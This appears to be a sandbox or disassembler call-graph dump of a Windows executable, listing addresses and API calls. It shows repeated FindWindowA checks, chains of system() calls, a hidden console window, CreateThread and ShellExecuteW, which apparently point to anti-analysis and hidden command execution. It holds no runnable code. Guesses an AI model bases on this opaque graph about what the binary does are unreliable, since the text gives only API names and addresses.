FindWindowA 3503->3506 3505 7ff60c475ee0 7 API calls 3504->3505 3505->3503 3507 7ff60c47cc4b 3506->3507 3508 7ff60c47cc46 3506->3508 3510 7ff60c47ce64 FindWindowA 3507->3510 3509 7ff60c475ee0 7 API calls 3508->3509 3509->3507 3511 7ff60c47ce7a 3510->3511 3512 7ff60c47ce75 3510->3512 3513 7ff60c47cf2a FindWindowA 3511->3513 3514 7ff60c475ee0 7 API calls 3512->3514 3515 7ff60c47cf3b 3513->3515 3516 7ff60c47cf40 FindWindowA 3513->3516 3514->3511 3549 7ff60c4751c0 3515->3549 3519 7ff60c47d07b 3516->3519 3520 7ff60c47d080 FindWindowA 3516->3520 3521 7ff60c4751c0 14 API calls 3519->3521 3523 7ff60c47d24a FindWindowA 3520->3523 3524 7ff60c47d245 3520->3524 3521->3520 3527 7ff60c47d47a FindWindowA 3523->3527 3528 7ff60c47d475 3523->3528 3525 7ff60c4751c0 14 API calls 3524->3525 3525->3523 3531 7ff60c47d64a 3527->3531 3532 7ff60c47d645 3527->3532 3529 7ff60c4751c0 14 API calls 3528->3529 3529->3527 3533 7ff60c4751c0 14 API calls 3532->3533 3533->3531 3535 7ff60c475f70 3534->3535 3535->3535 3536 7ff60c4760aa system 3535->3536 3537 7ff60c4760e9 3536->3537 3537->3537 3538 7ff60c476235 system 3537->3538 3539 7ff60c47626c 3538->3539 3539->3539 3540 7ff60c4763aa system 3539->3540 3541 7ff60c4763f7 system 3540->3541 3543 7ff60c47657a 3541->3543 3543->3543 3544 7ff60c4766c5 system 3543->3544 3545 7ff60c47671c 3544->3545 3545->3545 3546 7ff60c476865 system 3545->3546 3547 7ff60c4768af system 3546->3547 3547->3495 3550 7ff60c475257 system 3549->3550 3552 7ff60c4753de 3550->3552 3552->3552 3553 7ff60c47551a system 3552->3553 3554 7ff60c475559 3553->3554 3554->3554 3555 7ff60c4756a5 system 3554->3555 3556 7ff60c4756dc 3555->3556 3556->3556 3557 7ff60c47581a system 3556->3557 3558 7ff60c475867 system 3557->3558 3560 7ff60c4759ea system 3558->3560 3562 7ff60c475b8c 3560->3562 3562->3562 3563 7ff60c475cd5 system 3562->3563 3564 7ff60c475d1f 7 API calls 3563->3564 4499 7ff60c4726b0 4500 7ff60c4726c8 4499->4500 4501 7ff60c4726be 4499->4501 4502 7ff60c482f5c free 4501->4502 4502->4500 4811 7ff60c47f730 4812 7ff60c47f750 4811->4812 4813 7ff60c480510 8 API calls 4812->4813 4814 7ff60c47f75e 4813->4814 4815 7ff60c47dd30 4818 7ff60c472230 4815->4818 4817 7ff60c47dd58 4819 7ff60c47f770 7 API calls 4818->4819 4820 7ff60c472270 4819->4820 4821 7ff60c47229a 4820->4821 4822 7ff60c47f890 11 API calls 4820->4822 4823 7ff60c47f890 11 API calls 4821->4823 4822->4821 4824 7ff60c4722d7 4823->4824 4825 7ff60c472318 __std_exception_copy 4824->4825 4828 7ff60c472313 4824->4828 4831 7ff60c47230c _invalid_parameter_noinfo_noreturn 4824->4831 4826 7ff60c4723da 4825->4826 4827 7ff60c4723a5 4825->4827 4830 7ff60c482bf0 8 API calls 4826->4830 4829 7ff60c4723d5 4827->4829 4833 7ff60c4723ce _invalid_parameter_noinfo_noreturn 4827->4833 4832 7ff60c482f5c free 4828->4832 4834 7ff60c482f5c free 4829->4834 4835 7ff60c4723fb 4830->4835 4831->4828 4832->4825 4833->4829 4834->4826 4835->4817 4180 7ff60c4781ae 4181 7ff60c4781ca system 4180->4181 4182 7ff60c4781a0 4180->4182 4183 7ff60c478216 4181->4183 4182->4180 4183->4183 4184 7ff60c478364 system 4183->4184 4185 7ff60c4783b3 system 4184->4185 4187 7ff60c478543 system 4185->4187 4189 7ff60c4786dd 4187->4189 4189->4189 4190 7ff60c478824 system 4189->4190 4191 7ff60c47887d 4190->4191 4191->4191 4192 7ff60c4789c4 system 4191->4192 4193 7ff60c478a1d 4192->4193 4193->4193 4194 7ff60c478b64 system 4193->4194 4195 7ff60c478bbd 4194->4195 4195->4195 4196 7ff60c478d04 system 4195->4196 4197 7ff60c478d66 4196->4197 4197->4197 4198 7ff60c478eb4 system 4197->4198 4199 7ff60c478f09 4198->4199 4199->4199 4200 7ff60c479054 system 4199->4200 4201 7ff60c479096 system 4200->4201 4203 7ff60c479226 4201->4203 4203->4203 4204 7ff60c479374 system 4203->4204 4205 7ff60c4793ab 4204->4205 4205->4205 4206 7ff60c4794f4 system 4205->4206 4207 7ff60c479533 system 4206->4207 4209 7ff60c4796ab 4207->4209 4209->4209 4210 7ff60c4797f4 system 4209->4210 4211 7ff60c47982b 4210->4211 4211->4211 4212 7ff60c479974 system 4211->4212 4213 7ff60c4799ab 4212->4213 4213->4213 4214 7ff60c479af4 system 4213->4214 4215 7ff60c479b2b 4214->4215 4216 7ff60c479c84 system 4214->4216 4215->4216 4217 7ff60c479cd0 system 4216->4217 4219 7ff60c479e61 system 4217->4219 4221 7ff60c479fdb 4219->4221 4221->4221 4222 7ff60c47a124 system 4221->4222 4223 7ff60c47a186 4222->4223 4223->4223 4224 7ff60c47a2d4 system 4223->4224 4225 7ff60c47a316 system 4224->4225 4227 7ff60c47a4a6 4225->4227 4227->4227 4228 7ff60c47a5f4 system 4227->4228 4229 7ff60c47a643 system 4228->4229 4231 7ff60c47a7d3 system 4229->4231 4233 7ff60c47a96d 4231->4233 4233->4233 4234 7ff60c47aab4 system 4233->4234 4235 7ff60c47ab0d 4234->4235 4235->4235 4236 7ff60c47ac54 system 4235->4236 4237 7ff60c47aca9 4236->4237 4237->4237 4238 7ff60c47adf4 system 4237->4238 4239 7ff60c47ae41 system 4238->4239 4241 7ff60c47afd2 system 4239->4241 4243 7ff60c47b14b system 4241->4243 4245 7ff60c47b2c1 system 4243->4245 4247 7ff60c47b439 4245->4247 4248 7ff60c47b68f system 4245->4248 4836 7ff60c48431c 4837 7ff60c484345 4836->4837 4838 7ff60c484351 __current_exception __current_exception_context terminate 4836->4838 4838->4837 4249 7ff60c483b98 4250 7ff60c483bd0 __GSHandlerCheckCommon 4249->4250 4251 7ff60c483bfc 4250->4251 4252 7ff60c483beb __CxxFrameHandler4 4250->4252 4252->4251 4253 7ff60c484198 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N 4254 7ff60c4831a2 4259 7ff60c48387c GetModuleHandleW 4254->4259 4257 7ff60c4831ad 4258 7ff60c4831e8 _exit 4260 7ff60c4831a9 4259->4260 4260->4257 4260->4258 4261 7ff60c471fa0 __std_exception_copy 4262 7ff60c483fa0 4263 7ff60c483fb3 4262->4263 4264 7ff60c483fc0 4262->4264 4266 7ff60c47db90 4263->4266 4267 7ff60c47dbd4 4266->4267 4268 7ff60c47dba3 4266->4268 4267->4264 4269 7ff60c47dbcc 4268->4269 4270 7ff60c47dbeb _invalid_parameter_noinfo_noreturn 4268->4270 4271 7ff60c482f5c free 4269->4271 4271->4267 3566 7ff60c47d847 3567 7ff60c47d864 FindWindowA 3566->3567 3568 7ff60c47d830 3566->3568 3569 7ff60c47d87a FindWindowA 3567->3569 3570 7ff60c47d875 3567->3570 3568->3566 3573 7ff60c47d9ac 3569->3573 3574 7ff60c47d9a7 3569->3574 3571 7ff60c4751c0 14 API calls 3570->3571 3571->3569 3575 7ff60c475ee0 7 API calls 3574->3575 3575->3573 4839 7ff60c47fac6 4840 7ff60c47fad4 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 4839->4840 4841 7ff60c47fb04 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 4840->4841 4842 7ff60c47fb0e 4840->4842 4841->4842 4509 7ff60c472050 __std_exception_destroy 4276 7ff60c47fb40 ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 4510 7ff60c484440 4511 7ff60c484488 4510->4511 4512 7ff60c484451 4510->4512 4513 7ff60c484483 4512->4513 4514 7ff60c48447c _invalid_parameter_noinfo_noreturn 4512->4514 4515 7ff60c482f5c free 4513->4515 4514->4513 4515->4511 4843 7ff60c47e0c0 4844 7ff60c47e0e1 4843->4844 4854 7ff60c47e112 4843->4854 4847 7ff60c47e1fd _invalid_parameter_noinfo_noreturn 4844->4847 4848 7ff60c482f5c free 4844->4848 4845 7ff60c47e167 4846 7ff60c47e1b3 __std_exception_destroy 4845->4846 4845->4847 4850 7ff60c47e1ab 4845->4850 4851 7ff60c47e1dd 4846->4851 4852 7ff60c47e1ea 4846->4852 4853 7ff60c47e22a 4847->4853 4860 7ff60c47e25b 4847->4860 4848->4854 4849 7ff60c482f5c free 4849->4845 4855 7ff60c482f5c free 4850->4855 4856 7ff60c482f5c free 4851->4856 4857 7ff60c482f5c free 4853->4857 4859 7ff60c47e32b _invalid_parameter_noinfo_noreturn __std_exception_copy 4853->4859 4854->4845 4854->4847 4854->4849 4855->4846 4856->4852 4857->4860 4858 7ff60c47e2fc __std_exception_destroy 4858->4859 4864 7ff60c47e39c 4859->4864 4860->4859 4861 7ff60c482f5c free 4860->4861 4862 7ff60c47e2b0 4860->4862 4861->4862 4862->4858 4862->4859 4863 7ff60c482f5c free 4862->4863 4863->4858 4865 7ff60c47f770 7 API calls 4864->4865 4866 7ff60c47e3b8 4865->4866 4516 7ff60c47783e 4517 7ff60c47785a system 4516->4517 4518 7ff60c477830 4516->4518 4519 7ff60c4778a6 4517->4519 4518->4516 4519->4519 4520 7ff60c4779f4 system 4519->4520 4521 7ff60c477a40 system 4520->4521 4523 7ff60c477bd1 system 4521->4523 4525 7ff60c477d4b 4523->4525 4525->4525 4526 7ff60c477e94 system 4525->4526 4527 7ff60c477ef6 4526->4527 4527->4527 4528 7ff60c478044 system 4527->4528 4530 7ff60c478086 system 4528->4530 4531 7ff60c478216 4530->4531 4531->4531 4532 7ff60c478364 system 4531->4532 4533 7ff60c4783b3 system 4532->4533 4535 7ff60c478543 system 4533->4535 4537 7ff60c4786dd 4535->4537 4537->4537 4538 7ff60c478824 system 4537->4538 4539 7ff60c47887d 4538->4539 4539->4539 4540 7ff60c4789c4 system 4539->4540 4541 7ff60c478a1d 4540->4541 4541->4541 4542 7ff60c478b64 system 4541->4542 4543 7ff60c478bbd 4542->4543 4543->4543 4544 7ff60c478d04 system 4543->4544 4545 7ff60c478d66 4544->4545 4545->4545 4546 7ff60c478eb4 system 4545->4546 4547 7ff60c478f09 4546->4547 4547->4547 4548 7ff60c479054 system 4547->4548 4549 7ff60c479096 system 4548->4549 4551 7ff60c479226 4549->4551 4551->4551 4552 7ff60c479374 system 4551->4552 4553 7ff60c4793ab 4552->4553 4553->4553 4554 7ff60c4794f4 system 4553->4554 4555 7ff60c479533 system 4554->4555 4557 7ff60c4796ab 4555->4557 4557->4557 4558 7ff60c4797f4 system 4557->4558 4559 7ff60c47982b 4558->4559 4559->4559 4560 7ff60c479974 system 4559->4560 4561 7ff60c4799ab 4560->4561 4561->4561 4562 7ff60c479af4 system 4561->4562 4563 7ff60c479b2b 4562->4563 4564 7ff60c479c84 system 4562->4564 4563->4564 4565 7ff60c479cd0 system 4564->4565 4567 7ff60c479e61 system 4565->4567 4569 7ff60c479fdb 4567->4569 4569->4569 4570 7ff60c47a124 system 4569->4570 4571 7ff60c47a186 4570->4571 4571->4571 4572 7ff60c47a2d4 system 4571->4572 4573 7ff60c47a316 system 4572->4573 4575 7ff60c47a4a6 4573->4575 4575->4575 4576 7ff60c47a5f4 system 4575->4576 4577 7ff60c47a643 system 4576->4577 4579 7ff60c47a7d3 system 4577->4579 4581 7ff60c47a96d 4579->4581 4581->4581 4582 7ff60c47aab4 system 4581->4582 4583 7ff60c47ab0d 4582->4583 4583->4583 4584 7ff60c47ac54 system 4583->4584 4585 7ff60c47aca9 4584->4585 4585->4585 4586 7ff60c47adf4 system 4585->4586 4587 7ff60c47ae41 system 4586->4587 4589 7ff60c47afd2 system 4587->4589 4591 7ff60c47b14b system 4589->4591 4593 7ff60c47b2c1 system 4591->4593 4595 7ff60c47b439 4593->4595 4596 7ff60c47b68f system 4593->4596 4439 7ff60c4791be 4440 7ff60c4791da system 4439->4440 4441 7ff60c4791b0 4439->4441 4442 7ff60c479226 4440->4442 4441->4439 4442->4442 4443 7ff60c479374 system 4442->4443 4444 7ff60c4793ab 4443->4444 4444->4444 4445 7ff60c4794f4 system 4444->4445 4446 7ff60c479533 system 4445->4446 4448 7ff60c4796ab 4446->4448 4448->4448 4449 7ff60c4797f4 system 4448->4449 4450 7ff60c47982b 4449->4450 4450->4450 4451 7ff60c479974 system 4450->4451 4452 7ff60c4799ab 4451->4452 4452->4452 4453 7ff60c479af4 system 4452->4453 4454 7ff60c479b2b 4453->4454 4455 7ff60c479c84 system 4453->4455 4454->4455 4456 7ff60c479cd0 system 4455->4456 4458 7ff60c479e61 system 4456->4458 4460 7ff60c479fdb 4458->4460 4460->4460 4461 7ff60c47a124 system 4460->4461 4462 7ff60c47a186 4461->4462 4462->4462 4463 7ff60c47a2d4 system 4462->4463 4464 7ff60c47a316 system 4463->4464 4466 7ff60c47a4a6 4464->4466 4466->4466 4467 7ff60c47a5f4 system 4466->4467 4468 7ff60c47a643 system 4467->4468 4470 7ff60c47a7d3 system 4468->4470 4472 7ff60c47a96d 4470->4472 4472->4472 4473 7ff60c47aab4 system 4472->4473 4474 7ff60c47ab0d 4473->4474 4474->4474 4475 7ff60c47ac54 system 4474->4475 4476 7ff60c47aca9 4475->4476 4476->4476 4477 7ff60c47adf4 system 4476->4477 4478 7ff60c47ae41 system 4477->4478 4480 7ff60c47afd2 system 4478->4480 4482 7ff60c47b14b system 4480->4482 4484 7ff60c47b2c1 system 4482->4484 4486 7ff60c47b439 4484->4486 4487 7ff60c47b68f system 4484->4487 4597 7ff60c47a43e 4598 7ff60c47a45a system 4597->4598 4599 7ff60c47a430 4597->4599 4600 7ff60c47a4a6 4598->4600 4599->4597 4600->4600 4601 7ff60c47a5f4 system 4600->4601 4602 7ff60c47a643 system 4601->4602 4604 7ff60c47a7d3 system 4602->4604 4606 7ff60c47a96d 4604->4606 4606->4606 4607 7ff60c47aab4 system 4606->4607 4608 7ff60c47ab0d 4607->4608 4608->4608 4609 7ff60c47ac54 system 4608->4609 4610 7ff60c47aca9 4609->4610 4610->4610 4611 7ff60c47adf4 system 4610->4611 4612 7ff60c47ae41 system 4611->4612 4614 7ff60c47afd2 system 4612->4614 4616 7ff60c47b14b system 4614->4616 4618 7ff60c47b2c1 system 4616->4618 4620 7ff60c47b439 4618->4620 4621 7ff60c47b68f system 4618->4621 4622 7ff60c47b66d 4623 7ff60c47b660 4622->4623 4624 7ff60c47b68f system 4622->4624 4623->4622 3576 7ff60c483074 3577 7ff60c48308d 3576->3577 3578 7ff60c4831cb 3577->3578 3579 7ff60c483095 __scrt_acquire_startup_lock 3577->3579 3662 7ff60c483728 IsProcessorFeaturePresent 3578->3662 3581 7ff60c4831d5 3579->3581 3585 7ff60c4830b3 __scrt_release_startup_lock 3579->3585 3582 7ff60c483728 9 API calls 3581->3582 3583 7ff60c4831e0 3582->3583 3586 7ff60c4831e8 _exit 3583->3586 3584 7ff60c4830d8 3585->3584 3587 7ff60c48315e _get_initial_narrow_environment __p___argv __p___argc 3585->3587 3590 7ff60c483156 _register_thread_local_exe_atexit_callback 3585->3590 3596 7ff60c47e550 3587->3596 3590->3587 3597 7ff60c47e620 3596->3597 3597->3597 3668 7ff60c480510 3597->3668 3599 7ff60c47e63b SetConsoleTitleA 3600 7ff60c47e749 GetConsoleWindow 3599->3600 3601 7ff60c47e6a5 3599->3601 3602 7ff60c47e75a ShowWindow 3600->3602 3601->3600 3603 7ff60c47e889 system 3602->3603 3604 7ff60c47e781 3602->3604 3605 7ff60c47e8c7 SetConsoleTitleW 3603->3605 3604->3603 3607 7ff60c47eb19 ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1 3605->3607 3608 7ff60c47ea79 3605->3608 3609 7ff60c480510 8 API calls 3607->3609 3608->3607 3610 7ff60c47eb53 3609->3610 3611 7ff60c47ebbe 3610->3611 3685 7ff60c47f980 3610->3685 3612 7ff60c47ebf5 CreateThread CreateThread SleepEx CreateThread CreateThread 3611->3612 3615 7ff60c47f543 _invalid_parameter_noinfo_noreturn 3611->3615 3738 7ff60c482f5c 3611->3738 3613 7ff60c47ec78 GetConsoleWindow ShowWindow 3612->3613 3617 7ff60c47ed45 ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1 3613->3617 3618 7ff60c47eca3 3613->3618 3706 7ff60c47ff70 3617->3706 3618->3617 3622 7ff60c480240 11 API calls 3643 7ff60c47ed6a 3622->3643 3623 7ff60c47f980 7 API calls 3624 7ff60c47ee2b ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 3623->3624 3625 7ff60c47fb60 3 API calls 3624->3625 3625->3643 3626 7ff60c47f980 7 API calls 3627 7ff60c47ef2b ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 3626->3627 3628 7ff60c47fb60 3 API calls 3627->3628 3628->3643 3629 7ff60c47f980 7 API calls 3630 7ff60c47f02b ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 3629->3630 3631 7ff60c47fb60 3 API calls 3630->3631 3631->3643 3632 7ff60c47f560 _invalid_parameter_noinfo_noreturn free 3632->3643 3633 7ff60c480510 8 API calls 3633->3643 3634 7ff60c47f980 7 API calls 3635 7ff60c47f18b ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 3634->3635 3636 7ff60c47fb60 3 API calls 3635->3636 3636->3643 3637 7ff60c47f980 7 API calls 3639 7ff60c47f28b ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 3637->3639 3638 7ff60c482f5c free 3638->3643 3640 7ff60c47fb60 3 API calls 3639->3640 3640->3643 3641 7ff60c47ff70 26 API calls 3641->3643 3642 7ff60c47f980 7 API calls 3644 7ff60c47f38b ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 3642->3644 3643->3615 3643->3622 3643->3623 3643->3626 3643->3629 3643->3632 3643->3633 3643->3634 3643->3637 3643->3638 3643->3641 3643->3642 3732 7ff60c480240 3643->3732 3646 7ff60c47fb60 3 API calls 3644->3646 3646->3643 3647 7ff60c47f408 3741 7ff60c47f560 3647->3741 3663 7ff60c48374e 3662->3663 3664 7ff60c48375c memset RtlCaptureContext RtlLookupFunctionEntry 3663->3664 3665 7ff60c483796 RtlVirtualUnwind 3664->3665 3666 7ff60c4837d2 memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 3664->3666 3665->3666 3667 7ff60c483852 3666->3667 3667->3581 3669 7ff60c480536 3668->3669 3670 7ff60c480600 3668->3670 3671 7ff60c48053c memcpy 3669->3671 3672 7ff60c48055b 3669->3672 3756 7ff60c472140 ?_Xlength_error@std@@YAXPEBD __std_exception_copy 3670->3756 3671->3599 3674 7ff60c480605 3672->3674 3678 7ff60c4805cc 3672->3678 3682 7ff60c48056c 3672->3682 3683 7ff60c480587 memcpy 3672->3683 3757 7ff60c4720a0 3674->3757 3679 7ff60c482c10 3 API calls 3678->3679 3679->3683 3681 7ff60c48060b 3747 7ff60c482c10 3682->3747 3683->3599 3684 7ff60c4805c5 _invalid_parameter_noinfo_noreturn 3684->3678 3686 7ff60c47f9bc 3685->3686 3687 7ff60c47f9e4 ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 3686->3687 3692 7ff60c47f9d1 3686->3692 3687->3692 3688 7ff60c47fad4 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 3690 7ff60c47fb04 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 3688->3690 3693 7ff60c47eb9c ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 3688->3693 3689 7ff60c47fa70 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 3691 7ff60c47fa8e 3689->3691 3690->3693 3696 7ff60c47fac4 3691->3696 3697 7ff60c47fa9e ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 3691->3697 3692->3688 3692->3689 3692->3691 3694 7ff60c47fa6d 3692->3694 3695 7ff60c47fa43 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 3692->3695 3698 7ff60c47fb60 3693->3698 3694->3689 3695->3692 3696->3688 3697->3691 3764 7ff60c472b30 _Query_perf_frequency _Query_perf_counter 3698->3764 3701 7ff60c472b30 2 API calls 3703 7ff60c47fbb1 3701->3703 3702 7ff60c47fc23 3702->3610 3703->3702 3704 7ff60c47fc08 Sleep 3703->3704 3705 7ff60c472b30 2 API calls 3704->3705 3705->3703 3707 7ff60c480510 8 API calls 3706->3707 3708 7ff60c47ffc9 3707->3708 3709 7ff60c480510 8 API calls 3708->3709 3710 7ff60c480007 3709->3710 3766 7ff60c47f770 3710->3766 3712 7ff60c480040 3783 7ff60c472960 3712->3783 3715 7ff60c48008a 3717 7ff60c4800d9 3715->3717 3720 7ff60c4800d4 3715->3720 3722 7ff60c4800cd _invalid_parameter_noinfo_noreturn 3715->3722 3716 7ff60c480085 3719 7ff60c482f5c free 3716->3719 3721 7ff60c482c10 3 API calls 3717->3721 3718 7ff60c48007e _invalid_parameter_noinfo_noreturn 3718->3716 3719->3715 3723 7ff60c482f5c free 3720->3723 3724 7ff60c48011a 3721->3724 3722->3720 3723->3717 3725 7ff60c47f770 7 API calls 3724->3725 3729 7ff60c48012e 3725->3729 3726 7ff60c4801b8 3727 7ff60c482c10 3 API calls 3726->3727 3731 7ff60c4801d0 3727->3731 3728 7ff60c482c10 3 API calls 3728->3729 3729->3726 3729->3728 3730 7ff60c47f770 7 API calls 3729->3730 3730->3729 3731->3643 3733 7ff60c48025b 3732->3733 3737 7ff60c4802cf 3732->3737 3734 7ff60c48027f GetStdHandle SetConsoleTextAttribute 3733->3734 3820 7ff60c481830 3733->3820 3734->3733 3737->3647 3739 7ff60c48393c free 3738->3739 3742 7ff60c47f5ef 3741->3742 3744 7ff60c47f58b 3741->3744 3743 7ff60c47f610 _invalid_parameter_noinfo_noreturn 3742->3743 3746 7ff60c47f638 3743->3746 3744->3742 3744->3743 3745 7ff60c482f5c free 3744->3745 3745->3744 3748 7ff60c482c2a malloc 3747->3748 3749 7ff60c482c1b 3748->3749 3750 7ff60c480582 3748->3750 3749->3748 3751 7ff60c482c3a 3749->3751 3750->3683 3750->3684 3752 7ff60c482c45 3751->3752 3760 7ff60c483420 3751->3760 3754 7ff60c4720a0 Concurrency::cancel_current_task __std_exception_copy 3752->3754 3755 7ff60c482c4b 3754->3755 3756->3674 3758 7ff60c4720ae Concurrency::cancel_current_task 3757->3758 3759 7ff60c4720bf __std_exception_copy 3758->3759 3759->3681 3763 7ff60c483400 3760->3763 3762 7ff60c48342e _CxxThrowException 3763->3762 3765 7ff60c472b58 3764->3765 3765->3701 3767 7ff60c47f79e 3766->3767 3768 7ff60c47f879 3767->3768 3772 7ff60c47f7b4 3767->3772 3801 7ff60c472140 ?_Xlength_error@std@@YAXPEBD __std_exception_copy 3768->3801 3770 7ff60c47f7ba 3770->3712 3771 7ff60c47f7ea 3776 7ff60c482c10 3 API calls 3771->3776 3772->3770 3772->3771 3773 7ff60c47f87e 3772->3773 3774 7ff60c47f84e memcpy 3772->3774 3777 7ff60c47f849 3772->3777 3775 7ff60c4720a0 Concurrency::cancel_current_task __std_exception_copy 3773->3775 3774->3712 3778 7ff60c47f884 3775->3778 3779 7ff60c47f800 3776->3779 3780 7ff60c482c10 3 API calls 3777->3780 3781 7ff60c47f808 3779->3781 3782 7ff60c47f842 _invalid_parameter_noinfo_noreturn 3779->3782 3780->3774 3781->3774 3782->3777 3784 7ff60c472990 3783->3784 3802 7ff60c4802f0 3784->3802 3786 7ff60c472a2e 3789 7ff60c4802f0 memcmp 3786->3789 3792 7ff60c472aa2 3786->3792 3787 7ff60c472a1b memcmp 3787->3786 3799 7ff60c472a4c 3789->3799 3790 7ff60c472ae2 3806 7ff60c482bf0 3790->3806 3791 7ff60c472ada 3796 7ff60c482f5c free 3791->3796 3792->3790 3792->3791 3795 7ff60c472b1a _invalid_parameter_noinfo_noreturn 3792->3795 3793 7ff60c472a8f ?_Xout_of_range@std@@YAXPEBD 3800 7ff60c472a8d 3793->3800 3796->3790 3798 7ff60c472a7a memcmp 3798->3800 3799->3793 3799->3798 3800->3792 3800->3793 3801->3773 3803 7ff60c480329 3802->3803 3805 7ff60c4729e6 3802->3805 3804 7ff60c480366 memcmp 3803->3804 3803->3805 3804->3803 3805->3786 3805->3787 3807 7ff60c482bf9 3806->3807 3808 7ff60c472b04 3807->3808 3809 7ff60c4832b8 IsProcessorFeaturePresent 3807->3809 3808->3715 3808->3716 3808->3718 3810 7ff60c4832d0 3809->3810 3815 7ff60c48338c RtlCaptureContext 3810->3815 3816 7ff60c4833a6 RtlLookupFunctionEntry 3815->3816 3817 7ff60c4833bc RtlVirtualUnwind 3816->3817 3818 7ff60c4832e3 3816->3818 3817->3816 3817->3818 3819 7ff60c483284 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 3818->3819 3821 7ff60c481866 3820->3821 3822 7ff60c4818ac ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 3821->3822 3824 7ff60c481899 3821->3824 3822->3824 3825 7ff60c481921 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J 3824->3825 3828 7ff60c4818d0 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 3824->3828 3830 7ff60c4818f5 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 3824->3830 3825->3828 3829 7ff60c481911 3825->3829 3826 7ff60c4819ad ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 3827 7ff60c4802af GetStdHandle SetConsoleTextAttribute 3826->3827 3827->3733 3827->3737 3828->3826 3828->3827 3829->3828 3831 7ff60c481945 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 3829->3831 3830->3824 3830->3829 3831->3828 3831->3829 4867 7ff60c4726f0 4874 7ff60c48267c GetLocaleInfoEx 4867->4874 4870 7ff60c480510 8 API calls 4871 7ff60c47275c LocalFree 4870->4871 4872 7ff60c482bf0 8 API calls 4871->4872 4873 7ff60c472777 4872->4873 4875 7ff60c4826ac FormatMessageA 4874->4875 4877 7ff60c472725 4875->4877 4877->4870 3955 7ff60c4819f0 3956 7ff60c481a80 3955->3956 3956->3956 3957 7ff60c481a90 system 3956->3957 3958 7ff60c481ae3 3957->3958 3958->3958 4013 7ff60c48271c ___lc_codepage_func 3958->4013 3965 7ff60c481b58 3968 7ff60c482f5c free 3965->3968 3966 7ff60c481d77 system 3972 7ff60c481e30 3966->3972 3967 7ff60c481b51 _invalid_parameter_noinfo_noreturn 3967->3965 3970 7ff60c481b5d 3968->3970 3970->3966 3971 7ff60c481cf5 ShellExecuteW 3970->3971 3971->3966 3973 7ff60c48271c __std_fs_code_page 2 API calls 3972->3973 3974 7ff60c481e49 3973->3974 3975 7ff60c47da30 24 API calls 3974->3975 3976 7ff60c481e61 3975->3976 3977 7ff60c47e430 34 API calls 3976->3977 3978 7ff60c481e6b 3977->3978 3979 7ff60c481eb1 3978->3979 3981 7ff60c481eac 3978->3981 3983 7ff60c481ea5 _invalid_parameter_noinfo_noreturn 3978->3983 3980 7ff60c481fb9 system 3979->3980 3984 7ff60c481f34 ShellExecuteW 3979->3984 3986 7ff60c482070 3980->3986 3982 7ff60c482f5c free 3981->3982 3982->3979 3983->3981 3984->3980 3987 7ff60c48271c __std_fs_code_page 2 API calls 3986->3987 3988 7ff60c482089 3987->3988 3989 7ff60c47da30 24 API calls 3988->3989 3990 7ff60c4820a1 3989->3990 3991 7ff60c47e430 34 API calls 3990->3991 3992 7ff60c4820ab 3991->3992 3993 7ff60c4820f1 3992->3993 3994 7ff60c4820ec 3992->3994 3996 7ff60c4820e5 _invalid_parameter_noinfo_noreturn 3992->3996 3995 7ff60c4821f9 system 3993->3995 3998 7ff60c482174 ShellExecuteW 3993->3998 3997 7ff60c482f5c free 3994->3997 4000 7ff60c482300 3995->4000 3996->3994 3997->3993 3998->3995 4000->4000 4001 7ff60c48271c __std_fs_code_page 2 API calls 4000->4001 4002 7ff60c482312 4001->4002 4003 7ff60c47da30 24 API calls 4002->4003 4004 7ff60c48232a 4003->4004 4005 7ff60c47e430 34 API calls 4004->4005 4006 7ff60c482334 4005->4006 4007 7ff60c48237a 4006->4007 4008 7ff60c482375 4006->4008 4010 7ff60c48236e _invalid_parameter_noinfo_noreturn 4006->4010 4009 7ff60c482481 Sleep 4007->4009 4012 7ff60c4823fc ShellExecuteW 4007->4012 4011 7ff60c482f5c free 4008->4011 4010->4008 4011->4007 4012->4009 4014 7ff60c481af5 4013->4014 4015 7ff60c48272f AreFileApisANSI 4013->4015 4016 7ff60c47da30 4014->4016 4015->4014 4017 7ff60c47da84 4016->4017 4018 7ff60c47db51 4016->4018 4019 7ff60c47db77 4017->4019 4041 7ff60c482744 MultiByteToWideChar 4017->4041 4031 7ff60c47e430 4018->4031 4068 7ff60c472550 4019->4068 4022 7ff60c47db7d 4023 7ff60c472830 12 API calls 4022->4023 4025 